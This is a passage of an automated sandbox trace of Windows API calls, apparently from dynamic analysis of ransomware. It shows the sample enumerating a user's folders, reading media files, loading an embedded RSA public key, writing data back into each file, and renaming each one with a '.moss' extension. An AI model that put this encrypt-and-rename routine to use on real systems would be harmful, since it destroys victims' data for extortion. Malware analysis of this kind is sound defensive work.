Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0172.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1d8 | out: hHeap=0xcd0000) returned 1 [0172.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e1d8 [0172.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0172.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0172.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0172.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa2470 [0172.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0172.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0172.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1d8 | out: hHeap=0xcd0000) returned 1 [0172.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0172.077] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x360a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.077] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.078] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\9U56ddJ544.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\9u56ddj544.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\9U56ddJ544.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\9u56ddj544.mkv.moss")) returned 1 [0172.079] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\lkU0qT5ec.swf") returned=".swf" [0172.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\lkU0qT5ec.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\lku0qt5ec.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.080] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=31869) returned 1 [0172.080] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.082] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7c57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.082] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.083] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7c7d, lpOverlapped=0x0) returned 1 [0172.084] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.084] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.084] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.084] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.084] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0172.084] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.085] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.085] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.085] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.085] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.085] GetLastError () returned 0x0 [0172.085] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.085] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0172.085] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.085] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.085] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.085] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.085] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.085] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0172.086] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7c7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.086] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.086] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\lkU0qT5ec.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\lku0qt5ec.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\lkU0qT5ec.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\lku0qt5ec.swf.moss")) returned 1 [0172.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\RlA1F_u.flv") returned=".flv" [0172.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\RlA1F_u.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\rla1f_u.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.087] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=2039) returned 1 [0172.088] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.090] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.090] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.090] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.091] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7f7, lpOverlapped=0x0) returned 1 [0172.091] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.091] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.091] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.091] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0172.092] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.092] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.092] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.092] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.092] GetLastError () returned 0x0 [0172.092] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.092] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0172.092] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.092] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.092] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.092] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.092] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4b098 [0172.093] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.093] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.093] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\RlA1F_u.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\rla1f_u.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\RlA1F_u.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\rla1f_u.flv.moss")) returned 1 [0172.094] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.094] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.094] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0172.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0172.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0172.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b51478 [0172.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b51478 | out: hHeap=0xcd0000) returned 1 [0172.095] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.095] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.095] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.095] PathFindFileNameW (pszPath="") returned="" [0172.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0172.095] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f28b8 | out: hHeap=0xcd0000) returned 1 [0172.096] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.096] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0172.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0172.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0172.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.096] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0172.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0172.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x35b7de8 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x38) returned 0x362b8e0 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd797e0 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35b7de8 | out: hHeap=0xcd0000) returned 1 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0172.097] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0172.097] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2d68 | out: hHeap=0xcd0000) returned 1 [0172.097] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0172.097] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed00 | out: hHeap=0xcd0000) returned 1 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed00 [0172.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 